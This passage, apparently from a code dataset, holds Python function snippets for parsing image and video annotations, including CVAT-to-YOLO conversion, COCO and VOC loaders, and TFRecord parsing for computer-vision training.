tf.cast(gt_decoded, dtype=tf.int32)\n \n \n \n return {'image': image, 'segmentation_mask': gt}", "def process_cvat_xml(xml_file, image_dir, output_dir,username,password,ilabels):\n KNOWN_TAGS = {'box', 'image', 'attribute'}\n\n if (image_dir is None):\n image_dir=os.path.join(output_dir,\"data/obj\")\n os.makedirs(image_dir, exist_ok=True)\n\n os.makedirs(output_dir, exist_ok=True)\n cvat_xml = etree.parse(xml_file)\n basename = os.path.splitext( os.path.basename( xml_file ) )[0]\n current_labels = {}\n traintxt = \"\"\n auto_lbl_count = 0\n\n if (ilabels is not None):\n vlabels=ilabels.split(',')\n for _label in vlabels:\n current_labels[_label]=auto_lbl_count\n auto_lbl_count+=1\n\n tracks= cvat_xml.findall( './/track' )\n\n if (tracks is not None) and (len(tracks) > 0):\n frames = {}\n\n for track in tracks:\n trackid = int(track.get(\"id\"))\n label = track.get(\"label\")\n boxes = track.findall( './box' )\n for box in boxes:\n frameid = int(box.get('frame'))\n outside = int(box.get('outside'))\n #occluded = int(box.get('occluded')) #currently unused\n #keyframe = int(box.get('keyframe')) #currently unused\n xtl = float(box.get('xtl'))\n ytl = float(box.get('ytl'))\n xbr = float(box.get('xbr'))\n ybr = float(box.get('ybr'))\n\n frame = frames.get( frameid, {} )\n\n if outside == 0:\n frame[ trackid ] = { 'xtl': xtl, 'ytl': ytl, 'xbr': xbr, 'ybr': ybr, 'label': label }\n\n frames[ frameid ] = frame\n\n width = 
int(cvat_xml.find('.//original_size/width').text)\n height = int(cvat_xml.find('.//original_size/height').text)\n\n taskid = int(cvat_xml.find('.//task/id').text)\n\n urlsegment = cvat_xml.find(\".//segments/segment/url\").text\n urlbase = urlsegment.split(\"?\")[0]\n\n httpclient = requests.session()\n httpclient.get(urlbase)\n\n csrftoken = \"none\"\n sessionid = \"none\"\n\n # Spit out a list of each object for each frame\n for frameid in sorted(frames.keys()):\n image_name = \"%s_%08d.jpg\" % (basename, frameid)\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n if username is None:\n log.warn('{} image cannot be found. Is `{}` image directory correct?\\n'.format(image_path, image_dir))\n else:\n log.info('{} image cannot be found. Downloading from task ID {}\\n'.format(image_path, taskid))\n\n if sessionid == \"none\":\n if \"csrftoken\" in httpclient.cookies:\n csrftoken = httpclient.cookies[\"csrftoken\"]\n elif \"csrf\" in httpclient.cookies:\n csrftoken = httpclient.cookies[\"csrf\"]\n\n login_data = dict(username=username, password=password,\n csrfmiddlewaretoken=csrftoken, next='/dashboard')\n\n urllogin = urlbase+\"/auth/login\"\n httpclient.post(urllogin, data=login_data,\n headers=dict(Referer=urllogin))\n\n if (\"sessionid\" in httpclient.cookies):\n sessionid = httpclient.cookies[\"sessionid\"]\n\n url = urlbase+\"/api/v1/tasks/\"+str(taskid)+\"/frames/\"+ str(frameid)\n\n req = httpclient.get(url, headers=dict(\n csrftoken=csrftoken, sessionid=sessionid))\n\n with open(image_path, 'wb') as fo:\n fo.write(req.content)\n print('Url saved as %s\\n' % image_path)\n\n\n frame = frames[frameid]\n\n _yoloAnnotationContent=\"\"\n\n objids = sorted(frame.keys())\n\n for objid in objids:\n\n box = frame[objid]\n\n label = box.get('label')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n if not label in current_labels:\n current_labels[label] = auto_lbl_count\n auto_lbl_count+=1\n\n labelid=current_labels[label]\n yolo_x= (xmin + ((xmax-xmin)/2))/width\n yolo_y= (ymin + ((ymax-ymin)/2))/height\n yolo_w = (xmax - xmin) / width\n yolo_h = (ymax - ymin) / height\n\n if len(_yoloAnnotationContent) != 0:\n _yoloAnnotationContent += \"\\n\"\n\n _yoloAnnotationContent+=str(labelid)+\" \"+\"{:.6f}\".format(yolo_x) +\" \"+\"{:.6f}\".format(yolo_y) +\" \"+\"{:.6f}\".format(yolo_w) +\" \"+\"{:.6f}\".format(yolo_h)\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.txt')\n anno_path = os.path.join(image_dir, anno_name)\n\n _yoloFile = open(anno_path, \"w\", newline=\"\\n\")\n _yoloFile.write(_yoloAnnotationContent)\n _yoloFile.close()\n\n if len(traintxt)!=0:\n traintxt+=\"\\n\"\n\n traintxt+=image_path\n\n else:\n for img_tag in cvat_xml.findall('image'):\n image_name = img_tag.get('name')\n width = img_tag.get('width')\n height = img_tag.get('height')\n image_path = os.path.join(image_dir, image_name)\n if not os.path.exists(image_path):\n log.warn('{} image cannot be found. 
Is `{}` image directory correct?'.\n format(image_path, image_dir))\n\n unknown_tags = {x.tag for x in img_tag.iter()}.difference(KNOWN_TAGS)\n if unknown_tags:\n log.warn('Ignoring tags for image {}: {}'.format(image_path, unknown_tags))\n\n _yoloAnnotationContent = \"\"\n\n for box in img_tag.findall('box'):\n label = box.get('label')\n xmin = float(box.get('xtl'))\n ymin = float(box.get('ytl'))\n xmax = float(box.get('xbr'))\n ymax = float(box.get('ybr'))\n\n if not label in current_labels:\n current_labels[label] = auto_lbl_count\n auto_lbl_count += 1\n\n labelid = current_labels[label]\n yolo_x = (xmin + ((xmax-xmin)/2))/width\n yolo_y = (ymin + ((ymax-ymin)/2))/height\n yolo_w = (xmax - xmin) / width\n yolo_h = (ymax - ymin) / height\n\n if len(_yoloAnnotationContent) != 0:\n _yoloAnnotationContent += \"\\n\"\n\n _yoloAnnotationContent += str(labelid)+\" \"+\"{:.6f}\".format(yolo_x) + \" \"+\"{:.6f}\".format(\n yolo_y) + \" \"+\"{:.6f}\".format(yolo_w) + \" \"+\"{:.6f}\".format(yolo_h)\n\n anno_name = os.path.basename(os.path.splitext(image_name)[0] + '.txt')\n anno_path = os.path.join(image_dir, anno_name)\n\n _yoloFile = open(anno_path, \"w\", newline=\"\\n\")\n _yoloFile.write(_yoloAnnotationContent)\n _yoloFile.close()\n\n traintxt_file=open(output_dir+\"/train.txt\",\"w\",newline=\"\\n\")\n traintxt_file.write(traintxt)\n traintxt_file.close()", "def parse_path_image(proto_path, instance, model_path):\n\n # split the file name into parts\n name_parts = proto_path.split('_')\n # get the base path for the current model\n base_path = eval('instance.request.user.profile.' + model_path)\n # get the different parameters from the model\n # get the date\n date = datetime.datetime.strptime(name_parts[0], '%Y%m%d')\n\n # get the animal\n animal = Mouse.objects.get(mouse_name='_'.join(name_parts[1:4]))\n\n # get the region\n region = name_parts[4]\n\n # define the path for the different files\n bfpath = join(base_path, '_'.join((name_parts[0], animal.mouse_name, 'BF', region)) + '.tif')\n flpath = bfpath.replace('BF', 'FL')\n flgreenpath = bfpath.replace('BF', 'FLgreen')\n otherpath = bfpath.replace('BF', 'OTHER')\n\n return {'owner': instance.request.user,\n 'mouse': animal,\n 'window_date': date,\n 'bfPath': bfpath,\n 'flPath': flpath,\n 'flgreenPath': flgreenpath,\n 'otherPath': otherpath,\n 'region': region}", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n filename = osp.join(self.data_prefix, video_info['filename']) \n video_info['filename'] = filename\n frame_dir = video_info['filename']\n video_info['frame_dir'] = frame_dir \n video_info['index'] = i\n video_info['label'] = -1 \n video_info['text'] = [video_info['text']] \n video_infos.append(video_info) \n del ann_info\n return video_infos", "def do_parse_annotations(xmls_path_in, xml_path_out):\n label = \"puzzle piece\"\n new_xml = \"<?xml version='1.0' encoding='ISO-8859-1'?>\"\n new_xml += 
\"<dataset>\\n<name>Puzzle dataset</name>\\n<comment>Created by imglab tool.</comment>\\n\"\n new_xml += \"<images>\\n\"\n for i, annot in enumerate(glob.glob(xmls_path_in + \"/*.xml\")):\n tree = ET.parse(annot)\n root = tree.getroot()\n left = root[6][4][0].text\n top = root[6][4][1].text\n width = 70#str(int(root[6][4][2].text) - int(left))\n height = 70#str(int(root[6][4][3].text) - int(top))\n new_xml += \"{}<image file='{}jpg'>\\n\".format(1 * ' ', annot[:-3])\n new_xml += \"{}<box top='{}' left='{}' width='{}' height='{}'>\\n\".format(2 * ' ', top, left, width, height)\n new_xml += \"{}<label>{}</label>\\n{}</box>\\n'{}</image>\\n\".format(3 * ' ', label, 2 * ' ', 1 * ' ')\n\n new_xml += \"</images>\\n</dataset>\"\n out_file = open(xml_path_out, \"w\")\n out_file.write(new_xml)\n out_file.close()", "def filter_valid_data(image_dir, anno_path):\n images = []\n image_path_dict = {}\n image_anno_dict = {}\n if not os.path.isdir(image_dir):\n raise RuntimeError(\"Path given is not valid.\")\n if not os.path.isfile(anno_path):\n raise RuntimeError(\"Annotation file is not valid.\")\n\n with open(anno_path, \"rb\") as f:\n lines = f.readlines()\n for img_id, line in enumerate(lines):\n line_str = line.decode(\"utf-8\").strip()\n line_split = str(line_str).split(' ')\n file_name = line_split[0]\n image_path = os.path.join(image_dir, file_name)\n if os.path.isfile(image_path):\n images.append(img_id)\n image_path_dict[img_id] = image_path\n image_anno_dict[img_id] = anno_parser(line_split[1:])\n\n return images, image_path_dict, image_anno_dict", "def parse_image_annotations(self, image_dir, annotations):\n filename_ids = {}\n for i, annot in enumerate(annotations['images']):\n filename_ids[annot['file_name']] = i\n\n # order image data by file name\n images_annot_by_fname = {}\n for i, annot in enumerate(annotations['images']):\n images_annot_by_fname[annot['file_name']] = {\n \"file_name\": os.path.join(image_dir, annot['file_name']),\n \"width\": annot['width'],\n \"height\": annot['height'],\n \"id\": annot['id'],\n \"coco_url\": annot['coco_url'],\n }\n\n # order image data by file id\n images_fname_by_id = {}\n for i, annot in enumerate(annotations['images']):\n images_fname_by_id[annot['id']] = annot['file_name']\n\n return filename_ids, images_annot_by_fname, images_fname_by_id", "def parse(self, calibration_px=1.0):\n self.isParsingNeeded = False\n self.meta_data = {}\n self.data = []\n #CZI files\n if self.extend == '.czi':\n with czifile.CziFile(self.file_path) as czi:\n data = czi.asarray()\n Header_Metadata = str(czi).split('<ImageDocument>')\n string = '<ImageDocument>'+Header_Metadata[1]\n #print(string.strip(\"'\"))\n metadata = XMLET.fromstring(string.strip(\"'\"))\n try:\n #Query XML fore the metadata for picture shape(X;Y;Z-stacks).\n #Picture Shape.\n shapes = metadata.findall('./Metadata/Information/Image')[0]\n self.meta_data[\"ShapeSizeX\"] = int(shapes.findall('SizeX')[0].text)\n self.meta_data[\"ShapeSizeY\"] = int(shapes.findall('SizeY')[0].text)\n try:\n self.meta_data[\"ShapeSizeZ\"] = int(shapes.findall('SizeZ')[0].text)\n except:\n self.meta_data[\"ShapeSizeZ\"] = 1\n #Get the hyperstack dimension if the image is a hyperstack.\n try:\n self.meta_data[\"ShapeSizeC\"] = int(shapes.findall('SizeC')[0].text)\n except:\n self.meta_data[\"ShapeSizeC\"] = 1\n print(\"No info of color channels 1 assumed\")\n #Get physical pixel size of image(nm/px) convert to(µm/px).\n PixelSizes = metadata.findall('./Metadata/Scaling/Items/Distance')\n self.meta_data['SizeX'] = 
float(PixelSizes[0].findall('Value')[0].text)*10**6\n self.meta_data['SizeY'] = float(PixelSizes[1].findall('Value')[0].text)*10**6\n self.meta_data['SizeZ'] = float(PixelSizes[2].findall('Value')[0].text)*10**6\n except(ValueError):\n print (\"Metadata fail\")\n\n #Tiff files.\n #Tiff files are problematic because they most likely wont contain the necessary metadata.\n #Try to get the shape info over common dimensions.\n elif self.extend == '.tif':\n with tifffile.TiffFile(self.file_path) as tif:\n data = tif.asarray()\n for shape in data.shape:\n if shape <5:\n self.meta_data[\"ShapeSizeC\"] = shape\n elif shape <40:\n self.meta_data[\"ShapeSizeZ\"] = shape\n else:\n self.meta_data[\"ShapeSizeY\"] = shape\n self.meta_data[\"ShapeSizeX\"] = shape\n\n #Read Lsm Files.\n elif self.extend == '.lsm':\n with tifffile.TiffFile(self.file_path) as tif:\n data = tif.asarray(memmap=True)\n headerMetadata = str(tif.pages[0].cz_lsm_scan_info)\n metadataList = headerMetadata.split(\"\\n*\")\n #Get image shape from lsm header SizeC=0 if not given.\n for shapes in metadataList:\n if \"images_height\" in shapes:\n self.meta_data[\"ShapeSizeX\"]= int(shapes.split()[-1])\n if \"images_width\" in shapes:\n self.meta_data[\"ShapeSizeY\"]= int(shapes.split()[-1])\n if \"images_number_planes\" in shapes:\n self.meta_data[\"ShapeSizeZ\"]= int(shapes.split()[-1])\n if \"images_number_channels\" in shapes:\n self.meta_data[\"ShapeSizeC\"]= int(shapes.split()[-1])\n #Get physical pixel size of image(nm/px) convert to(µm/px).\n data = np.swapaxes(data,1,2)\n lsm_header = str(tif.pages[0].tags.cz_lsm_info)\n LsmInfo = lsm_header.split(\", \")\n i = 0\n #Query for pixel size.\n for element in LsmInfo:\n if \"e-0\" in element:\n i += 1\n if i == 1:\n self.meta_data['SizeX'] = (float(element)*10**6)\n if i == 2:\n self.meta_data['SizeY'] = (float(element)*10**6)\n if i == 3:\n self.meta_data['SizeZ'] = (float(element)*10**6)\n\n elif self.extend == \".png\":\n data = misc.imread(self.file_path)\n data = np.expand_dims(np.expand_dims(data[...,0],0),0)\n self.meta_data[\"ShapeSizeC\"] = 1\n self.meta_data[\"ShapeSizeZ\"] = 1\n self.meta_data[\"ShapeSizeX\"] = data.shape[2]\n self.meta_data[\"ShapeSizeY\"] = data.shape[3]\n self.meta_data[\"SizeZ\"] = 1\n self.meta_data[\"SizeX\"] = 0.01\n self.meta_data[\"SizeY\"] = 0.01\n #Bring all formats in the same shape.\n self.data = np.reshape(data,(self.meta_data[\"ShapeSizeC\"],self.meta_data[\"ShapeSizeZ\"],self.meta_data[\"ShapeSizeX\"],self.meta_data[\"ShapeSizeY\"]))\n self.meta_data['ChannelNum'] = self.meta_data[\"ShapeSizeC\"]\n #Set pixel size to manuell value if there are no metadata.\n if self.meta_data == {}:\n self.set_calibration(calibration_px)\n #Set the box for manuel calibration to the actuell pixel size.", "def parse():\n all_players = list(FACE_IMAGE_LOCATIONS.keys())\n face_encodings = VideoParser.__load_faces_encodings(all_players)\n player_occurrences = VideoParser.__get_player_occurrences(all_players, face_encodings)\n VideoParser.__save_parsed_video(player_occurrences)", "def process_image(self):\n\n detect.main(self.nn_args)", "def test_nominal_case(self):\n\n image_filename, boxes = list(annotation.read(self.filename))\n self.assertEqual(image_filename, 'image.jpg')\n self.assertEqual(len(boxes), 2)\n width = 400\n height = 300\n b = boxes[0]\n self.assertEqual(b.xmin, 10 / width)\n self.assertEqual(b.ymin, 20 / height)\n self.assertEqual(b.xmax, 30 / width)\n self.assertEqual(b.ymax, 40 / height)", "def annotate(path):\n if path.startswith('http') or 
path.startswith('gs:'):\n image = types. Image()\n image.source.image_uri = path\n else:\n with io.open(path, 'rb') as image_file:\n content = image_file.read()\n image = types.Image(content=content)\n web_detection = client.web_detection(image=image).web_detection\n return web_detection", "def load_annotations(self):\n assert self.ann_file.endswith('.pkl')\n ann_info = hload_pkl(self.ann_file)\n\n video_infos = []\n for i, video_info in enumerate(ann_info):\n info_dict = {} \n info_dict['filename'] = video_info['vid_name']\n frame_dir = info_dict['filename']\n info_dict['frame_dir'] = frame_dir\n info_dict['index'] = i\n info_dict['label'] = video_info['answer_idx']\n info_dict['answers'] = video_info['answers']\n info_dict['question'] = video_info['q']\n info_dict['subtitle'] = video_info['located_sub_text']\n info_dict['frame_ind'] = video_info['located_frame']\n info_dict['total_frames'] = video_info.get('total_frames', -1)\n video_infos.append(info_dict) \n del ann_info\n\n return video_infos", "def load_annotations(self, image_index):\n\t\t\t# Get ground truth annotations.\n\t\t\tannotations_ids = self.coco.getAnnIds(imgIds=self.image_ids[image_index], iscrowd=False)\n\t\t\tannotations = {'labels': np.empty((0,)), 'bboxes': np.empty((0, 4))}\n\n\t\t\t# If needed get info for masks.\n\t\t\tif self.mask:\n\t\t\t\timport cv2\n\n\t\t\t\t# Get image info.\n\t\t\t\timage_info = self.coco.loadImgs(self.image_ids[image_index])[0]\n\t\t\t\tannotations['masks'] = []\n\n\t\t\t# Some images appear to miss annotations (like image with id 257034).\n\t\t\tif len(annotations_ids) == 0:\n\t\t\t\treturn annotations\n\n\n\t\t\t# Parse annotations\n\t\t\tcoco_annotations = self.coco.loadAnns(annotations_ids)\n\t\t\tfor idx, a in enumerate(coco_annotations):\n\t\t\t\t# Some annotations have basically no width / height, skip them.\n\t\t\t\tif a['bbox'][2] < 1 or a['bbox'][3] < 1:\n\t\t\t\t\tcontinue\n\n\t\t\t\tannotations['labels'] = np.concatenate([annotations['labels'], [self.coco_label_to_label(a['category_id'])]], axis=0)\n\t\t\t\tannotations['bboxes'] = np.concatenate([annotations['bboxes'], [[\n\t\t\t\t\ta['bbox'][0],\n\t\t\t\t\ta['bbox'][1],\n\t\t\t\t\ta['bbox'][0] + a['bbox'][2],\n\t\t\t\t\ta['bbox'][1] + a['bbox'][3],\n\t\t\t\t]]], axis=0)\n\n\t\t\t\t# If needed get annotations for masks.\n\t\t\t\tif self.mask:\n\t\t\t\t\tif 'segmentation' not in a:\n\t\t\t\t\t\traise ValueError('Expected \\'segmentation\\' key in annotation, got: {}'.format(a))\n\n\t\t\t\t\tmask = np.zeros((image_info['height'], image_info['width'], 1), dtype=np.uint8)\n\t\t\t\t\tfor seg in a['segmentation']:\n\t\t\t\t\t\tpoints = np.array(seg).reshape((len(seg) // 2, 2)).astype(int)\n\n\t\t\t\t\t\t# Draw mask.\n\t\t\t\t\t\tcv2.fillPoly(mask, [points.astype(int)], (1,))\n\n\t\t\t\t\tannotations['masks'].append(mask.astype(float))\n\n\n\t\t\treturn annotations", "def _process_image(filename, coder):\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n \n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n # Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n return image_data, height, width", "def __read_img_file(filename, label):\n image = cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2RGB)\n height, width, 
_ = image.shape\n image = cv2.resize(image, (img_size, img_size))\n # A label is consist of [y1, x1, y2, x2, class_idx]\n label = np.reshape(label, (-1, 5))\n rel_bboxes = label[..., 0:4] / np.array([height, width, height, width], np.float32)\n label = np.concatenate([rel_bboxes, np.expand_dims(label[..., -1], 1)], axis=-1)\n return image, label", "def __parse_image_load(self, image_path: str, image_label: int):\n one_hot = tf.one_hot(image_label, self.num_classes, dtype=dtypes.int32)\n if self.rgb:\n flag = cv2.IMREAD_COLOR\n else:\n flag = cv2.IMREAD_GRAYSCALE\n\n img = cv2.imread(image_path, flags=flag)\n img = cv2.resize(img, (self.image_shape[1], self.image_shape[0]), interpolation=cv2.INTER_AREA).astype(\n np.float32)\n\n if self.normalize_images:\n img_mean = np.mean(img, axis=(0, 1))\n img_std = np.std(img, axis=(0, 1))\n\n img = (img - img_mean) / img_std\n\n return img, one_hot", "def _load_action_annotation(self, anno_filepath):\n # Check\n assert os.path.exists(anno_filepath), \\\n 'Path does not exist: {}'.format(anno_filepath)\n # Open and read\n lines = None\n with open(anno_filepath) as f:\n # format: imgidx x1 y1 x2 y2 label_list\n # whre label list look like this: 0 0 0 0 1 0 0 (assume here has six action classes)\n lines = f.readlines()\n \n if not lines:\n print\n print \"missing anno_filepath:\", anno_filepath\n sys.exit(1)\n\n # init\n image_index, gt_roidb = [], []\n\n # Process\n for line in lines:\n # Initialize\n boxes = np.zeros((1, 4), dtype=np.uint16)\n gt_classes = np.zeros(1, dtype=np.int32)\n overlaps = np.zeros((1, self.num_classes), dtype=np.float32)\n\n line = line.strip().split()\n args = 0\n imgidx = line[args]\n image_index.append(imgidx)\n\n args += 1\n x1, y1, x2, y2 = line[args: args + 4]\n x1 = float(x1) - 1\n y1 = float(y1) - 1\n x2 = float(x2) - 1\n y2 = float(y2) - 1\n\n args += 4\n classname = line[args]\n cls = self._class_to_ind[classname.lower().strip()]\n\n gt_classes[0] = cls\n boxes[0, :] = [x1, y1, x2, y2]\n overlaps[0, cls] = 1.0\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n # \n img_anno_dict = {\n 'boxes' : boxes, \n 'gt_classes': gt_classes, \n 'gt_overlaps' : overlaps, \n 'flipped' : False}\n gt_roidb.append(img_anno_dict)\n\n return image_index, gt_roidb", "def proc_image(self, tokens):\n\n print \"IMAGE:\", tokens, tokens.asList(), tokens.keys()\n\n raise NotImplementedError", "def _prepare_image_and_label(self, data):\n image = tf.io.decode_image(data['image/encoded'], channels=3)\n label = tf.io.decode_image(data['image/segmentation/class/encoded'],\n channels=1)\n height = data['image/height']\n width = data['image/width']\n image = tf.reshape(image, (height, width, 3))\n label = tf.reshape(label, (1, height, width))\n label = tf.cast(label, tf.float32)\n # Normalizes image with mean and std pixel values.\n image = input_utils.normalize_image(image)\n return image, label", "def _get_annotation(self, image_id):\n annotation_file = self.image_sets_dir / f'{image_id}.xml'\n objects = ET.parse(annotation_file).findall('object')\n boxes = []\n labels = []\n is_difficult = []\n for obj in objects:\n class_name = obj.find('name').text.lower().strip()\n if class_name in self.class_dict:\n bbox = obj.find('bndbox')\n\n x0 = float(bbox.find('xmin').text) - 1\n y0 = float(bbox.find('ymin').text) - 1\n x1 = float(bbox.find('xmax').text) - 1\n y1 = float(bbox.find('ymax').text) - 1\n boxes.append([x0, y0, x1, y1])\n\n labels.append(self.class_dict[class_name])\n\n is_difficult_str = obj.find('difficult').text\n 
is_difficult.append(int(is_difficult_str) if is_difficult_str else 0)\n\n return (np.array(boxes, dtype=np.float32),\n np.array(labels, dtype=np.int64),\n np.array(is_difficult, dtype=np.uint8))", "def load_metadata(self, path):\n self.paths = []\n self.annotations = []\n\n with open(path, \"r\") as f:\n for line in f:\n line = line.strip().split(\" \")\n \n rgb_path = line[0]\n\n if len(line) > 1:\n bounding_boxes = np.array([list(map(int, box.split(','))) for box in line[1:]])\n else:\n bounding_boxes = []\n \n self.annotations.append({\n \"rgb_path\": rgb_path, \n \"bounding_boxes\": bounding_boxes,\n })", "def coco_format(type_, id_list, annotation_url_list, file_list, result_list, label_list, coco_flag=0):\n annotations = []\n for i, result in enumerate(result_list):\n temp = {}\n annotation_url = annotation_url_list[i]\n file_path = file_list[i]\n temp['id'] = id_list[i]\n temp['annotation'] = []\n im = cv2.imread(file_path)\n height, width, _ = im.shape\n if result.shape[0] == 0:\n temp['annotation'] = json.dumps(temp['annotation'])\n annotations.append(temp)\n with open(annotation_url, 'w') as w:\n w.write(temp['annotation'])\n continue\n else:\n for j in range(result.shape[0]):\n cls_id = int(result[j][0]) + 1 + coco_flag\n x1 = result[j][1]\n x2 = result[j][3]\n y1 = result[j][2]\n y2 = result[j][4]\n score = result[j][5]\n width = max(0, x2 - x1)\n height = max(0, y2 - y1)\n if cls_id in label_list:\n temp['annotation'].append({\n 'area': width * height,\n 'bbox': [x1, y1, width, height],\n 'category_id': cls_id,\n 'iscrowd': 0,\n 'segmentation': [[x1, y1, x2, y1, x2, y2, x1, y2]],\n 'score': score\n })\n if type_ == 2 and len(temp['annotation']) > 0:\n temp['annotation'] = [temp['annotation'][0]]\n temp['annotation'][0].pop('area')\n temp['annotation'][0].pop('bbox')\n temp['annotation'][0].pop('iscrowd')\n temp['annotation'][0].pop('segmentation')\n temp['annotation'] = json.dumps(temp['annotation'])\n annotations.append(temp)\n with open(annotation_url, 'w') as wr:\n wr.write(temp['annotation'])\n return annotations", "def inspect_annotation_with_image(image_path, annotation_path):\n with Image.open(image_path) as image:\n tree = ET.parse(annotation_path)\n root = tree.getroot()\n for member in root.findall('object'):\n # bbox contains 4 coordinate of format [xmin, ymin, xmax, ymax]\n bbox = member.find(\"bndbox\")\n\n # if object is None, ignore\n if member.find(\"name\") is None:\n continue\n\n xmin = int(bbox.find('xmin').text)\n ymin = int(bbox.find('ymin').text)\n xmax = int(bbox.find('xmax').text)\n ymax = int(bbox.find('ymax').text)\n\n draw = ImageDraw.Draw(image)\n draw.rectangle([xmin, ymin, xmax, ymax], width=2)\n draw.text([xmin, ymin], \"%s\"%member.find(\"name\").text)\n image.show()", "def get(self,index,record, indices):\n video_id = str(record.path).strip().split('/frames/')[1]\n \n ann_file = self._annot_path + '/' + str(record.path).strip().split('/frames/')[1] + '/' + 'puppet_mask.mat' \n \n gt = np.zeros((self.num_segments,self.cfg.MAX_NUM_GT_BOXES,(self.num_classes + 4)),\n dtype=np.float32)\n num_boxes = np.ones((self.num_segments),dtype=np.float32)\n im_info = np.zeros((self.num_segments,3),dtype=np.float32)\n one_hot_labels = np.zeros((self.num_classes),dtype = np.float)\n count = 0\n images =[]\n\n \n class_label =int(record.labels)\n one_hot_labels[class_label] = 1\n \n \n for seg_ind in indices:\n\n #image information \n image_path = os.path.join(record.path, '{:05d}.png'.format(seg_ind))\n im = imread(image_path)\n im = 
im[:,:,::-1].astype(np.float32, copy=False) #RGB\n height,width,_= im.shape \n im_scale = float(self.cfg.TRAIN.TRIM_HEIGHT) / float(self.cfg.TRAIN.TRIM_WIDTH)\n im = cv2.resize(im, (400,300), fx=im_scale, fy=im_scale,\n interpolation=cv2.INTER_LINEAR)\n im_scale1 = float(self.cfg.TRAIN.TRIM_HEIGHT) / height\n im_scale2 = float(self.cfg.TRAIN.TRIM_WIDTH) / width\n im_info[count,:]=self.cfg.TRAIN.TRIM_HEIGHT,len(im[2]),im_scale\n \n gt[count,0,:4] = self.get_annot_image_boxes(ann_file, seg_ind)\n x1,y1,x2,y2 = gt[count,0,:4]\n y1,y2 = y1*im_scale1,y2*im_scale1\n x1,x2 = x1*im_scale2,x2*im_scale2\n gt[count,0,:4] = x1,y1,x2,y2\n gt[count,0,4:] = one_hot_labels\n count += 1\n images.append(im)\n \n \n max_shape = np.array([imz.shape for imz in images]).max(axis=0)\n blob = np.zeros((len(images), max_shape[0], max_shape[1], 3),\n dtype=np.float32)\n for i in range(len(images)):\n blob[i,0:images[i].shape[0], 0:images[i].shape[1], :] = images[i]\n\n process_data = self.transform(blob)\n return process_data,gt,num_boxes,im_info", "def separate_annotations():\n data_root = '/home/ubuntu/datasets/YT-VIS/'\n ann_file = data_root + 'annotations/instances_train_sub.json'\n import json\n with open(ann_file, 'r') as f:\n ann = json.load(f)\n # ann['videos'] = ann['videos'][15]\n # video_id = [0]\n from tqdm import tqdm\n for id in tqdm(range(len(ann['videos']))):\n videos = []\n anns = []\n video = ann['videos'][id]\n video['id'] = 1\n videos.append(video)\n\n i = 1\n for a in ann['annotations']:\n if a['video_id'] == id + 1:\n anno = a\n anno['id'] = i\n anno['video_id'] = 1\n anns.append(anno)\n i += 1\n # anno = ann['annotations'][id]\n # anno['id'] = 1\n # anno['video_id'] = 1\n # anns.append(anno)\n\n file_name = videos[0]['file_names'][0].split('/')[0]\n\n ann_new = dict()\n ann_new['info'] = ann['info']\n ann_new['licenses'] = ann['licenses']\n ann_new['categories'] = ann['categories']\n ann_new['videos'] = videos\n ann_new['annotations'] = anns\n\n with open(data_root + 'train/Annotations/{}/{}_annotations.json'.format(file_name, file_name), 'w') as f:\n json.dump(ann_new, f, ensure_ascii=False)", "def parser(self, serialized_example):\n features = {\n 'image/height': tf.FixedLenFeature([], tf.int64),\n 'image/width': tf.FixedLenFeature([], tf.int64),\n 'image/colorspace': tf.FixedLenFeature([], tf.string),\n 'image/channels': tf.FixedLenFeature([], tf.int64),\n 'image/class/label': tf.FixedLenFeature([], tf.int64),\n 'image/class/synset': tf.FixedLenFeature([], tf.string),\n 'image/class/text': tf.FixedLenFeature([], tf.string),\n 'image/object/bbox/xmin': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/ymin': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/xmax': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/ymax': tf.VarLenFeature(tf.float32),\n 'image/object/bbox/label': tf.VarLenFeature(tf.int64),\n 'image/format': tf.FixedLenFeature([], tf.string),\n 'image/encoded': tf.FixedLenFeature([], tf.string)}\n parsed_features = tf.parse_single_example(serialized_example, features)\n\n # Get label as a Tensor.\n label = parsed_features['image/class/label']\n\n # Decode the image JPEG string into a Tensor.\n image = tf.image.decode_jpeg(parsed_features['image/encoded'],\n channels=self.DEPTH)\n\n # VGG preprocessing borrowed from slim; includes data augmentation so train_with_distortion should be set to True.\n if self.mode == tf.estimator.ModeKeys.TRAIN:\n assert self.params['train_with_distortion'] == True\n is_training = True\n else:\n is_training = False\n image = 
